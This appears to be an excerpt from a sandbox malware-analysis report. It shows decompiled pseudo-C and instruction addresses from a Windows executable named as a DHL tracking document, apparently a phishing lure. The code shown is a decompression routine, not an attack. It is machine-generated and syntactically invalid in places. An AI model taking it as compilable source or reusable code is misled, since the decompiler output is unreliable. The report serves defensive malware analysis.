                    									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    									 *( *(__ebp - 0x68)) = __al;
                    									__ecx =  *(__ebp - 0x14);
                    									 *(__ecx +  *(__ebp - 8)) = __al;
                    									__eax = __ecx + 1;
                    									__edx = 0;
                    									_t191 = __eax %  *(__ebp - 0x74);
                    									__eax = __eax /  *(__ebp - 0x74);
                    									__edx = _t191;
                    									L79:
                    									 *(__ebp - 0x14) = __edx;
                    									L80:
                    									 *(__ebp - 0x88) = 2;
                    									goto L1;
                    								}
                    								if(__ebx >= 0x100) {
                    									goto L53;
                    								}
                    								goto L40;
                    							} else {
                    								L36:
                    								if( *(__ebp - 0x6c) == 0) {
                    									 *(__ebp - 0x88) = 0xd;
                    									L170:
                    									_t568 = 0x22;
                    									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                    									_t535 = 0;
                    									L172:
                    									return _t535;
                    								}
                    								__ecx =  *(__ebp - 0x70);
                    								__eax =  *(__ebp - 0xc);
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								_t121 = __ebp - 0x70;
                    								 *_t121 =  *(__ebp - 0x70) + 1;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								goto L38;
                    							}
                    						}
                    					}
                    					L1:
                    					_t534 =  *(_t614 - 0x88);
                    					if(_t534 > 0x1c) {
                    						L171:
                    						_t535 = _t534 | 0xffffffff;
                    						goto L172;
                    					}
                    					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                    						case 0:
                    							if( *(_t614 - 0x6c) == 0) {
                    								goto L170;
                    							}
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                    							_t534 =  *( *(_t614 - 0x70));
                    							if(_t534 > 0xe1) {
                    								goto L171;
                    							}
                    							_t538 = _t534 & 0x000000ff;
                    							_push(0x2d);
                    							asm("cdq");
                    							_pop(_t570);
                    							_push(9);
                    							_pop(_t571);
                    							_t610 = _t538 / _t570;
                    							_t540 = _t538 % _t570 & 0x000000ff;
                    							asm("cdq");
                    							_t605 = _t540 % _t571 & 0x000000ff;
                    							 *(_t614 - 0x3c) = _t605;
                    							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                    							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                    							_t613 = (0x300 << _t605 + _t610) + 0x736;
                    							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                    								L10:
                    								if(_t613 == 0) {
                    									L12:
                    									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                    									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                    									goto L15;
                    								} else {
                    									goto L11;
                    								}
                    								do {
                    									L11:
                    									_t613 = _t613 - 1;
                    									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                    								} while (_t613 != 0);
                    								goto L12;
                    							}
                    							if( *(_t614 - 4) != 0) {
                    								GlobalFree( *(_t614 - 4));
                    							}
                    							_t534 = GlobalAlloc(0x40, 0x600); // executed
                    							 *(_t614 - 4) = _t534;
                    							if(_t534 == 0) {
                    								goto L171;
                    							} else {
                    								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                    								goto L10;
                    							}
                    						case 1:
                    							L13:
                    							__eflags =  *(_t614 - 0x6c);
                    							if( *(_t614 - 0x6c) == 0) {
                    								 *(_t614 - 0x88) = 1;
                    								goto L170;
                    							}
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                    							_t45 = _t614 - 0x48;
                    							 *_t45 =  *(_t614 - 0x48) + 1;
                    							__eflags =  *_t45;
                    							L15:
                    							if( *(_t614 - 0x48) < 4) {
                    								goto L13;
                    							}
                    							_t546 =  *(_t614 - 0x40);
                    							if(_t546 ==  *(_t614 - 0x74)) {
                    								L20:
                    								 *(_t614 - 0x48) = 5;
                    								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                    								goto L23;
                    							}
                    							 *(_t614 - 0x74) = _t546;
                    							if( *(_t614 - 8) != 0) {
                    								GlobalFree( *(_t614 - 8));
                    							}
                    							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                    							 *(_t614 - 8) = _t534;
                    							if(_t534 == 0) {
                    								goto L171;
                    							} else {
                    								goto L20;
                    							}
                    						case 2:
                    							L24:
                    							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                    							 *(_t614 - 0x84) = 6;
                    							 *(_t614 - 0x4c) = _t553;
                    							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                    							goto L132;
                    						case 3:
                    							L21:
                    							__eflags =  *(_t614 - 0x6c);
                    							if( *(_t614 - 0x6c) == 0) {
                    								 *(_t614 - 0x88) = 3;
                    								goto L170;
                    							}
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							_t67 = _t614 - 0x70;
                    							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                    							__eflags =  *_t67;
                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                    							L23:
                    							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                    							if( *(_t614 - 0x48) != 0) {
                    								goto L21;
                    							}
                    							goto L24;
                    						case 4:
                    							goto L133;
                    						case 5:
                    							goto L137;
                    						case 6:
                    							goto L0;
                    						case 7:
                    							__eflags =  *(__ebp - 0x40) - 1;
                    							if( *(__ebp - 0x40) != 1) {
                    								__eax =  *(__ebp - 0x24);
                    								 *(__ebp - 0x80) = 0x16;
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x28);
                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    								__eax =  *(__ebp - 0x2c);
                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    								__eax = 0;
                    								__eflags =  *(__ebp - 0x38) - 7;
                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    								__al = __al & 0x000000fd;
                    								__eax = (__eflags >= 0) - 1 + 0xa;
                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    								__eax =  *(__ebp - 4);
                    								__eax =  *(__ebp - 4) + 0x664;
                    								__eflags = __eax;
                    								 *(__ebp - 0x58) = __eax;
                    								goto L68;
                    							}
                    							__eax =  *(__ebp - 4);
                    							__ecx =  *(__ebp - 0x38);
                    							 *(__ebp - 0x84) = 8;
                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    							goto L132;
                    						case 8:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xa;
                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    							} else {
                    								__eax =  *(__ebp - 0x38);
                    								__ecx =  *(__ebp - 4);
                    								__eax =  *(__ebp - 0x38) + 0xf;
                    								 *(__ebp - 0x84) = 9;
                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    							}
                    							goto L132;
                    						case 9:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								goto L89;
                    							}
                    							__eflags =  *(__ebp - 0x60);
                    							if( *(__ebp - 0x60) == 0) {
                    								goto L171;
                    							}
                    							__eax = 0;
                    							__eflags =  *(__ebp - 0x38) - 7;
                    							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    							__eflags = _t258;
                    							0 | _t258 = _t258 + _t258 + 9;
                    							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    							goto L75;
                    						case 0xa:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xb;
                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x28);
                    							goto L88;
                    						case 0xb:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__ecx =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x20);
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    							} else {
                    								__eax =  *(__ebp - 0x24);
                    							}
                    							__ecx =  *(__ebp - 0x28);
                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    							L88:
                    							__ecx =  *(__ebp - 0x2c);
                    							 *(__ebp - 0x2c) = __eax;
                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    							L89:
                    							__eax =  *(__ebp - 4);
                    							 *(__ebp - 0x80) = 0x15;
                    							__eax =  *(__ebp - 4) + 0xa68;
                    							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    							goto L68;
                    						case 0xc:
                    							L99:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xc;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t334 = __ebp - 0x70;
                    							 *_t334 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t334;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							__eax =  *(__ebp - 0x2c);
                    							goto L101;
                    						case 0xd:
                    							goto L36;
                    						case 0xe:
                    							goto L45;
                    						case 0xf:
                    							goto L57;
                    						case 0x10:
                    							L109:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x10;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t365 = __ebp - 0x70;
                    							 *_t365 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t365;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							goto L111;
                    						case 0x11:
                    							L68:
                    							__esi =  *(__ebp - 0x58);
                    							 *(__ebp - 0x84) = 0x12;
                    							goto L132;
                    						case 0x12:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 0x58);
                    								 *(__ebp - 0x84) = 0x13;
                    								__esi =  *(__ebp - 0x58) + 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							__eflags = __eax;
                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                    							goto L130;
                    						case 0x13:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								_t469 = __ebp - 0x58;
                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
                    								__eflags =  *_t469;
                    								 *(__ebp - 0x30) = 0x10;
                    								 *(__ebp - 0x40) = 8;
                    								L144:
                    								 *(__ebp - 0x7c) = 0x14;
                    								goto L145;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							 *(__ebp - 0x30) = 8;
                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    							L130:
                    							 *(__ebp - 0x58) = __eax;
                    							 *(__ebp - 0x40) = 3;
                    							goto L144;
                    						case 0x14:
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    							__eax =  *(__ebp - 0x80);
                    							goto L140;
                    						case 0x15:
                    							__eax = 0;
                    							__eflags =  *(__ebp - 0x38) - 7;
                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    							__al = __al & 0x000000fd;
                    							__eax = (__eflags >= 0) - 1 + 0xb;
                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    							goto L120;
                    						case 0x16:
                    							__eax =  *(__ebp - 0x30);
                    							__eflags = __eax - 4;
                    							if(__eax >= 4) {
                    								_push(3);
                    								_pop(__eax);
                    							}
                    							__ecx =  *(__ebp - 4);
                    							 *(__ebp - 0x40) = 6;
                    							__eax = __eax << 7;
                    							 *(__ebp - 0x7c) = 0x19;
                    							 *(__ebp - 0x58) = __eax;
                    							goto L145;
                    						case 0x17:
                    							L145:
                    							__eax =  *(__ebp - 0x40);
                    							 *(__ebp - 0x50) = 1;
                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    							goto L149;
                    						case 0x18:
                    							L146:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x18;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t484 = __ebp - 0x70;
                    							 *_t484 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t484;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L148:
                    							_t487 = __ebp - 0x48;
                    							 *_t487 =  *(__ebp - 0x48) - 1;
                    							__eflags =  *_t487;
                    							L149:
                    							__eflags =  *(__ebp - 0x48);
                    							if( *(__ebp - 0x48) <= 0) {
                    								__ecx =  *(__ebp - 0x40);
                    								__ebx =  *(__ebp - 0x50);
                    								0 = 1;
                    								__eax = 1 << __cl;
                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    								__eax =  *(__ebp - 0x7c);
                    								 *(__ebp - 0x44) = __ebx;
                    								goto L140;
                    							}
                    							__eax =  *(__ebp - 0x50);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    							__eax =  *(__ebp - 0x58);
                    							__esi = __edx + __eax;
                    							 *(__ebp - 0x54) = __esi;
                    							__ax =  *__esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								__cx = __ax >> 5;
                    								__eax = __eax - __ecx;
                    								__edx = __edx + 1;
                    								__eflags = __edx;
                    								 *__esi = __ax;
                    								 *(__ebp - 0x50) = __edx;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L148;
                    							} else {
                    								goto L146;
                    							}
                    						case 0x19:
                    							__eflags = __ebx - 4;
                    							if(__ebx < 4) {
                    								 *(__ebp - 0x2c) = __ebx;
                    								L119:
                    								_t393 = __ebp - 0x2c;
                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                    								__eflags =  *_t393;
                    								L120:
                    								__eax =  *(__ebp - 0x2c);
                    								__eflags = __eax;
                    								if(__eax == 0) {
                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    									goto L170;
                    								}
                    								__eflags = __eax -  *(__ebp - 0x60);
                    								if(__eax >  *(__ebp - 0x60)) {
                    									goto L171;
                    								}
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    								__eax =  *(__ebp - 0x30);
                    								_t400 = __ebp - 0x60;
                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    								__eflags =  *_t400;
                    								goto L123;
                    							}
                    							__ecx = __ebx;
                    							__eax = __ebx;
                    							__ecx = __ebx >> 1;
                    							__eax = __ebx & 0x00000001;
                    							__ecx = (__ebx >> 1) - 1;
                    							__al = __al | 0x00000002;
                    							__eax = (__ebx & 0x00000001) << __cl;
                    							__eflags = __ebx - 0xe;
                    							 *(__ebp - 0x2c) = __eax;
                    							if(__ebx >= 0xe) {
                    								__ebx = 0;
                    								 *(__ebp - 0x48) = __ecx;
                    								L102:
                    								__eflags =  *(__ebp - 0x48);
                    								if( *(__ebp - 0x48) <= 0) {
                    									__eax = __eax + __ebx;
                    									 *(__ebp - 0x40) = 4;
                    									 *(__ebp - 0x2c) = __eax;
                    									__eax =  *(__ebp - 4);
                    									__eax =  *(__ebp - 4) + 0x644;
                    									__eflags = __eax;
                    									L108:
                    									__ebx = 0;
                    									 *(__ebp - 0x58) = __eax;
                    									 *(__ebp - 0x50) = 1;
                    									 *(__ebp - 0x44) = 0;
                    									 *(__ebp - 0x48) = 0;
                    									L112:
                    									__eax =  *(__ebp - 0x40);
                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    										_t391 = __ebp - 0x2c;
                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    										__eflags =  *_t391;
                    										goto L119;
                    									}
                    									__eax =  *(__ebp - 0x50);
                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    									__eax =  *(__ebp - 0x58);
                    									__esi = __edi + __eax;
                    									 *(__ebp - 0x54) = __esi;
                    									__ax =  *__esi;
                    									__ecx = __ax & 0x0000ffff;
                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    									__eflags =  *(__ebp - 0xc) - __edx;
                    									if( *(__ebp - 0xc) >= __edx) {
                    										__ecx = 0;
                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    										__ecx = 1;
                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    										__ebx = 1;
                    										__ecx =  *(__ebp - 0x48);
                    										__ebx = 1 << __cl;
                    										__ecx = 1 << __cl;
                    										__ebx =  *(__ebp - 0x44);
                    										__ebx =  *(__ebp - 0x44) | __ecx;
                    										__cx = __ax;
                    										__cx = __ax >> 5;
                    										__eax = __eax - __ecx;
                    										__edi = __edi + 1;
                    										__eflags = __edi;
                    										 *(__ebp - 0x44) = __ebx;
                    										 *__esi = __ax;
                    										 *(__ebp - 0x50) = __edi;
                    									} else {
                    										 *(__ebp - 0x10) = __edx;
                    										0x800 = 0x800 - __ecx;
                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    										 *__esi = __dx;
                    									}
                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                    									if( *(__ebp - 0x10) >= 0x1000000) {
                    										L111:
                    										_t368 = __ebp - 0x48;
                    										 *_t368 =  *(__ebp - 0x48) + 1;
                    										__eflags =  *_t368;
                    										goto L112;
                    									} else {
                    										goto L109;
                    									}
                    								}
                    								__ecx =  *(__ebp - 0xc);
                    								__ebx = __ebx + __ebx;
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    								 *(__ebp - 0x44) = __ebx;
                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    									__ecx =  *(__ebp - 0x10);
                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    									__ebx = __ebx | 0x00000001;
                    									__eflags = __ebx;
                    									 *(__ebp - 0x44) = __ebx;
                    								}
                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                    								if( *(__ebp - 0x10) >= 0x1000000) {
                    									L101:
                    									_t338 = __ebp - 0x48;
                    									 *_t338 =  *(__ebp - 0x48) - 1;
                    									__eflags =  *_t338;
                    									goto L102;
                    								} else {
                    									goto L99;
                    								}
                    							}
                    							__edx =  *(__ebp - 4);
                    							__eax = __eax - __ebx;
                    							 *(__ebp - 0x40) = __ecx;
                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    							goto L108;
                    						case 0x1a:
                    							goto L55;
                    						case 0x1b:
                    							L75:
                    							__eflags =  *(__ebp - 0x64);
                    							if( *(__ebp - 0x64) == 0) {
                    								 *(__ebp - 0x88) = 0x1b;
                    								goto L170;
                    							}
                    							__eax =  *(__ebp - 0x14);
                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    							__eflags = __eax -  *(__ebp - 0x74);
                    							if(__eax >=  *(__ebp - 0x74)) {
                    								__eax = __eax +  *(__ebp - 0x74);
                    								__eflags = __eax;
                    							}
                    							__edx =  *(__ebp - 8);
                    							__cl =  *(__eax + __edx);
                    							__eax =  *(__ebp - 0x14);
                    							 *(__ebp - 0x5c) = __cl;
                    							 *(__eax + __edx) = __cl;
                    							__eax = __eax + 1;
                    							__edx = 0;
                    							_t274 = __eax %  *(__ebp - 0x74);
                    							__eax = __eax /  *(__ebp - 0x74);
                    							__edx = _t274;
                    							__eax =  *(__ebp - 0x68);
                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    							_t283 = __ebp - 0x64;
                    							 *_t283 =  *(__ebp - 0x64) - 1;
                    							__eflags =  *_t283;
                    							 *( *(__ebp - 0x68)) = __cl;
                    							goto L79;
                    						case 0x1c:
                    							while(1) {
                    								L123:
                    								__eflags =  *(__ebp - 0x64);
                    								if( *(__ebp - 0x64) == 0) {
                    									break;
                    								}
                    								__eax =  *(__ebp - 0x14);
                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    								__eflags = __eax -  *(__ebp - 0x74);
                    								if(__eax >=  *(__ebp - 0x74)) {
                    									__eax = __eax +  *(__ebp - 0x74);
                    									__eflags = __eax;
                    								}
                    								__edx =  *(__ebp - 8);
                    								__cl =  *(__eax + __edx);
                    								__eax =  *(__ebp - 0x14);
                    								 *(__ebp - 0x5c) = __cl;
                    								 *(__eax + __edx) = __cl;
                    								__eax = __eax + 1;
                    								__edx = 0;
                    								_t414 = __eax %  *(__ebp - 0x74);
                    								__eax = __eax /  *(__ebp - 0x74);
                    								__edx = _t414;
                    								__eax =  *(__ebp - 0x68);
                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    								__eflags =  *(__ebp - 0x30);
                    								 *( *(__ebp - 0x68)) = __cl;
                    								 *(__ebp - 0x14) = __edx;
                    								if( *(__ebp - 0x30) > 0) {
                    									continue;
                    								} else {
                    									goto L80;
                    								}
                    							}
                    							 *(__ebp - 0x88) = 0x1c;
                    							goto L170;
                    					}
                    				}
                    			}













                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x00000000
                    0x0040667d
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                    • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
